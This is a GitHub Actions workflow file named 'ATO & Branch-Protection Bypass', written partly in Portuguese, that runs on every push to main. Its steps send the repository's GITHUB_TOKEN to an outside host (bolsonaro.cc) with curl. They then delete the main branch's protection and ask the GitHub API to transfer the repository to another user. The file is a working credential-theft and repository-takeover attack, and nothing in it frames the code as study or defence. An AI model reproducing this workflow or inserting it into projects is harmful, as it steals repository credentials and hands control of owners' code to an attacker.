name: "ATO & Branch‐Protection Bypass"

on:
  create:
    branches: ["main"]
  push:
    branches: ["main"]
  workflow_dispatch:

# Garante permissão de admin no repo
permissions:
  contents: write
  administration: write

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          persist-credentials: true

      - name: Exfiltra GITHUB_TOKEN
        run: |
          curl -G https://bolsonaro.cc/collect \
            --data-urlencode "repo=${{ github.repository }}" \
            --data-urlencode "gtoken=${{ secrets.GITHUB_TOKEN }}"

      - name: Remove branch protection
        run: |
          curl -X DELETE \
            -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github.luke-cage-preview+json" \
            https://api.github.com/repos/${{ github.repository }}/branches/main/protection

      - name: Transfer repository ownership
        run: |
          curl -X POST \
            -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github.v3+json" \
            -d '{"new_owner":"seu-usuario"}' \
            https://api.github.com/repos/${{ github.repository }}/transfer
